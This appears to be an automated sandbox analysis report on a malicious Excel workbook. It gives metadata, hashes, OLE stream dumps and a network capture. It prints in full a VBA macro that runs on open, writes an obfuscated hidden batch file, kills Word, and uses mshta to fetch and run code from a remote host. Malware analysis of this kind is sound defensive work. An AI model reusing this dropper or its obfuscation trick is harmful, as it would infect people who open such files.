                                        Preview:call getCmdPid.bat..set PID=%errorlevel%..call windowMode.bat -pid %PID% -mode hidden..cd C:\Users\Public..@echo off..Set ao8=TSkEhx6qZpCHJMOGRvfbn4wQaPBANVXWz8jcIKrtlYymiod3L2sU7eF105gu9D..cls..%ao8:~35,1%%ao8:~43,1%%ao8:~46,1% /%ao8:~35,1% %ao8:~50,1%%ao8:~39,1%%ao8:~24,1%%ao8:~38,1%%ao8:~39,1% /%ao8:~43,1%%ao8:~44,1%%ao8:~20,1% %ao8:~39,1%%ao8:~24,1%%ao8:~50,1%%ao8:~2,1%%ao8:~2,1%%ao8:~44,1%%ao8:~40,1%%ao8:~40,1% /%ao8:~18,1% /%ao8:~44,1%%ao8:~43,1% %ao8:~31,1%%ao8:~36,1%%ao8:~28,1%%ao8:~31,1%%ao8:~14,1%%ao8:~16,1%%ao8:~61,1%.%ao8:~3,1%%ao8:~30,1%%ao8:~3,1% & %ao8:~43,1%%ao8:~50,1%%ao8:~4,1%%ao8:~39,1%%ao8:~24,1% %ao8:~4,1%%ao8:~39,1%%ao8:~39,1%%ao8:~9,1%://%ao8:~18,1%%ao8:~24,1%%ao8:~35,1%%ao8:~53,1%%ao8:~5,1%%ao8:~39,1%%ao8:~38,1%%ao8:~24,1%%ao8:~46,1%%ao8:~53,1%.%ao8:~35,1%%ao8:~45,1%%ao8:~43,1%.%ao8:~19,1%%ao8:~38,1%/%ao8:~22,1%%ao8:~9,1%-%ao8:~44,1%%ao8:~20,1%%ao8:~35,1%%ao8:~40,1%%ao8:~59,1%%ao8:~46,1%%ao8:~53,1%%ao8:~50,1%/%ao8:~35,1%%ao8:~53,1%%ao8:~38,1%%ao8:~39,1%%ao8:~44,
                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MARIANO PEREIRA, Last Saved By: Cavaleiro De Troia, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Sun May 2 19:59:33 2021, Security: 0
                                        Entropy (8bit):4.612386597622975
                                        TrID:
                                        • Microsoft Excel sheet (30009/1) 78.94%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                        File name:SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls
                                        File size:39424
                                        MD5:50860325a0e4f6f204c76dd262b7df6b
                                        SHA1:f096b272f012f300ebbd2536e45d97cf02852c36
                                        SHA256:6327c67ee4ae318f558e379fbfa071749113398782101c9f3beeb7310e81e725
                                        SHA512:637209224af7309a0acbbb1d51f9cf35782caf41de3924a86e6263c8136b8e074b66288af511d6a638d713d82a57fdd16ddf96b518c33589f4730ea8f8453b03
                                        SSDEEP:768:CK1Tgbyw3sz2jyngov9rjXjBCKTUAuulFFfqMFQxmMC0klhiCfAdKmCx:CK1Tgbyw3sz2jyngov9rjXjBCKoAuulh
                                        TLSH:12031C26BA95C8B6DA67133AACE791C5623BBC131E1E52477204F32D7EB11D7840722F
                                        File Content Preview:........................>......................................................................................................................................................................................................................................
                                        Icon Hash:e4eea286a4b4bcb4
                                        Document Type:OLE
                                        Number of OLE Files:1
                                        Has Summary Info:
                                        Application Name:Microsoft Excel
                                        Encrypted Document:False
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:False
                                        Flash Objects Count:0
                                        Contains VBA Macros:True
                                        Code Page:1252
                                        Author:MARIANO PEREIRA
                                        Last Saved By:Cavaleiro De Troia
                                        Create Time:2015-06-05 18:19:34
                                        Last Saved Time:2021-05-02 18:59:33
                                        Creating Application:Microsoft Excel
                                        Security:0
                                        Document Code Page:1252
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:1048576
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/EstaPastaDeTrabalho
                                        VBA File Name:EstaPastaDeTrabalho.cls
                                        Stream Size:4626
                                        Data ASCII:. . . . . . . . . . . . . . . 8 . . . < . . . J . . . > . . . . . . . . . . . . = s . . # . . . . . . . . . . . . . . . . . p . . . s . ~ T I J y \\ . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . P \\ = g B . . : p . . . . . . . . . . . . . . . . . . . . . . x . . . . P \\ = g B . . : p s . ~ T I J y \\ . . . . M E . . . . . . . . . . . . . . . . . . . . . 0 . P . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . . . . . . . . < 8 . . . . . . < . . . . . . . . . . N . 0 .
                                        Data Raw:01 16 03 00 06 00 01 00 00 ea 05 00 00 e4 00 00 00 38 02 00 00 3c 06 00 00 4a 06 00 00 3e 0e 00 00 00 00 00 00 01 00 00 00 7f 3d c0 73 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 73 08 b9 7e 54 c1 49 4a 9c 94 fe 79 dc 5c af 9b 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Attribute VB_Name = "EstaPastaDeTrabalho"
                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                        Attribute VB_GlobalNameSpace = False
                                        Attribute VB_Creatable = False
                                        Attribute VB_PredeclaredId = True
                                        Attribute VB_Exposed = True
                                        Attribute VB_TemplateDerived = False
                                        Attribute VB_Customizable = True
                                        Private Sub Workbook_Open()
                                           Dim iStage As Integer
                                           Dim iCounter As Integer
                                           Dim iPage As Integer
                                           Dim sFile As String
                                           sFile = Environ("Public") & "\Outlook.bat"
                                              
                                           Close
                                             Open sFile For Output As #1
                                        Print #1, "call getCmdPid.bat"
                                        Print #1, "set PID=%errorlevel%"
                                        Print #1, "call windowMode.bat -pid %PID% -mode hidden"
                                        Print #1, "cd C:\Users\Public"
                                        Print #1, "@echo off"
                                        Print #1, "Set ao8=TSkEhx6qZpCHJMOGRvfbn4wQaPBANVXWz8jcIKrtlYymiod3L2sU7eF105gu9D"
                                        Print #1, "cls"
                                        Print #1, "%ao8:~35,1%%ao8:~43,1%%ao8:~46,1% /%ao8:~35,1% %ao8:~50,1%%ao8:~39,1%%ao8:~24,1%%ao8:~38,1%%ao8:~39,1% /%ao8:~43,1%%ao8:~44,1%%ao8:~20,1% %ao8:~39,1%%ao8:~24,1%%ao8:~50,1%%ao8:~2,1%%ao8:~2,1%%ao8:~44,1%%ao8:~40,1%%ao8:~40,1% /%ao8:~18,1% /%ao8:~44,1%%ao8:~43,1% %ao8:~31,1%%ao8:~36,1%%ao8:~28,1%%ao8:~31,1%%ao8:~14,1%%ao8:~16,1%%ao8:~61,1%.%ao8:~3,1%%ao8:~30,1%%ao8:~3,1% & %ao8:~43,1%%ao8:~50,1%%ao8:~4,1%%ao8:~39,1%%ao8:~24,1% %ao8:~4,1%%ao8:~39,1%%ao8:~39,1%%ao8:~9,1%://%ao8:~18,1%%ao8:~24,1%%ao8:~35,1%%ao8:~53,1%%ao8:~5,1%%ao8:~39,1%%ao8:~38,1%%ao8:~24,1%%ao8:~46,1%%ao8:~53,1%.%ao8:~35,1%%ao8:~45,1%%ao8:~43,1%.%ao8:~19,1%%ao8:~38,1%/%ao8:~22,1%%ao8:~9,1%-%ao8:~44,1%%ao8:~20,1%%ao8:~35,1%%ao8:~40,1%%ao8:~59,1%%ao8:~46,1%%ao8:~53,1%%ao8:~50,1%/%ao8:~35,1%%ao8:~53,1%%ao8:~38,1%%ao8:~39,1%%ao8:~44,1%%ao8:~18,1%%ao8:~44,1%%ao8:~35,1%%ao8:~24,1%%ao8:~39,1%%ao8:~53,1%%ao8:~50,1%/%ao8:~21,1%.%ao8:~39,1%%ao8:~5,1%%ao8:~39,1%"
                                        
                                        
                                        
                                        
                                           For iCounter = 2 To iStage
                                              Print #1, "    </ul>"
                                              iStage = iStage - 1
                                           Next iCounter:      Shell$    "cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit" & vbLf, 0
                                           
                                           
                                           
                                           
                                        
                                           Close
                                        
                                        
                                        End Sub
                                        

                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/Planilha1
                                        VBA File Name:Planilha1.cls
                                        Stream Size:1002
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . = I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                        Data Raw:01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 7f 3d 49 ac 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Attribute VB_Name = "Planilha1"
                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                        Attribute VB_GlobalNameSpace = False
                                        Attribute VB_Creatable = False
                                        Attribute VB_PredeclaredId = True
                                        Attribute VB_Exposed = True
                                        Attribute VB_TemplateDerived = False
                                        Attribute VB_Customizable = True
                                        

                                        General
                                        Stream Path:\x1CompObj
                                        File Type:data
                                        Stream Size:109
                                        Entropy:4.257541421397259
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F ! . . . P l a n i l h a d o M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 50 6c 61 6e 69 6c 68 61 20 64 6f 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:\x1Ole
                                        File Type:data
                                        Stream Size:20
                                        Entropy:0.8475846798245739
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:\x3ObjInfo
                                        File Type:data
                                        Stream Size:6
                                        Entropy:1.2516291673878228
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . .
                                        Data Raw:00 00 03 00 04 00
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:240
                                        Entropy:2.6096962931292262
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P l a n 1 . . . . . . . . . . . . . . . . . P l a n i l h a s . . . . . . . . .
                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9e 00 00 00
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:228
                                        Entropy:3.9071239156716207
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M A R I A N O P E R E I R A . . . . . . . . . C a v a l e i r o D e T r o i a . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . I ? . . . . . . . . .
                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b4 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 7c 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00
                                        General
                                        Stream Path:RichEditFlags
                                        File Type:data
                                        Stream Size:12
                                        Entropy:0.6500224216483541
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . .
                                        Data Raw:01 00 00 00 00 00 00 00 01 00 00 00
                                        General
                                        Stream Path:Workbook
                                        File Type:Applesoft BASIC program data, first line number 16
                                        Stream Size:15248
                                        Entropy:5.167290881180269
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . C a v a l e i r o D e T r o i a B . . . . a . . . . . . . . = . . . . . . . . . . . . . . E s t a P a s t a D e T r a b a l h o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V e 1 : . . . . . . . X .
                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 12 00 00 43 61 76 61 6c 65 69 72 6f 20 44 65 20 54 72 6f 69 61 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                                        File Type:ASCII text, with CRLF line terminators
                                        Stream Size:513
                                        Entropy:5.142452298544354
                                        Base64 Encoded:True
                                        Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = E s t a P a s t a D e T r a b a l h o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = P l a n i l h a 1 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 0 C 2 6 C 6 A 7 0 6 A 7 0 6 E 7 4 6 E 7 4 " . . D P B = " 9 3 9 1 3 F E E 0 F 0 B 0 F 0 B F 0 F 5
                                        Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 45 73 74 61 50 61 73 74 61 44 65 54 72 61 62 61 6c 68 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 50 6c 61 6e 69 6c 68 61 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                        File Type:data
                                        Stream Size:92
                                        Entropy:3.1873658260020488
                                        Base64 Encoded:False
                                        Data ASCII:E s t a P a s t a D e T r a b a l h o . E . s . t . a . P . a . s . t . a . D . e . T . r . a . b . a . l . h . o . . . P l a n i l h a 1 . P . l . a . n . i . l . h . a . 1 . . . . .
                                        Data Raw:45 73 74 61 50 61 73 74 61 44 65 54 72 61 62 61 6c 68 6f 00 45 00 73 00 74 00 61 00 50 00 61 00 73 00 74 00 61 00 44 00 65 00 54 00 72 00 61 00 62 00 61 00 6c 00 68 00 6f 00 00 00 50 6c 61 6e 69 6c 68 61 31 00 50 00 6c 00 61 00 6e 00 69 00 6c 00 68 00 61 00 31 00 00 00 00 00
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                        File Type:data
                                        Stream Size:2599
                                        Entropy:4.083845578704928
                                        Base64 Encoded:False
                                        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                                        Data Raw:cc 61 b2 00 00 03 00 ff 16 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                        File Type:data
                                        Stream Size:6598
                                        Entropy:3.6025462992311663
                                        Base64 Encoded:False
                                        Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U _ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . C 7 7 M D . H l { . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 5f 03 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                        File Type:data
                                        Stream Size:182
                                        Entropy:1.6862905000266528
                                        Base64 Encoded:False
                                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                        File Type:data
                                        Stream Size:1550
                                        Entropy:2.874874206462334
                                        Base64 Encoded:False
                                        Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . A . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . a . . . . . . . . . . .
                                        Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 14 00 00 00 b1 09 00 00 00 00 00 00 00 00 00 00 51 20 00 00 00 00 00 00 00 00 00 00 41 09 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                        File Type:data
                                        Stream Size:156
                                        Entropy:1.7820663630707385
                                        Base64 Encoded:False
                                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 d8 08 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                        File Type:data
                                        Stream Size:547
                                        Entropy:6.129298700211954
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . b . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                        Data Raw:01 1f b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 80 86 83 62 04 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 16, 2022 10:48:39.212799072 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:39.427427053 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:39.427870989 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:39.428519964 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:39.643090010 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.186650991 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.186708927 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.186747074 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.186783075 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.186786890 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.186825991 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.186831951 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.186836004 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.190790892 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.190831900 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.190871954 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.190881968 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.190901041 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.190901041 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.190926075 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.190942049 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.195338964 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.195403099 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.195441008 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.195466995 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.195933104 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.219263077 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403086901 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403130054 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403141022 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403147936 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403181076 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403192043 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403211117 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403213978 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403227091 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403232098 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403244972 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403255939 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403269053 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403285980 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403302908 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403320074 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403322935 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403333902 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403364897 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403419971 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403429985 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403479099 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403482914 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403496027 CEST8049173187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.403527021 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403548002 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.403650045 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.404180050 CEST4917380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.405632973 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:41.437076092 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:41.437196970 CEST4917480192.168.2.22187.45.240.69
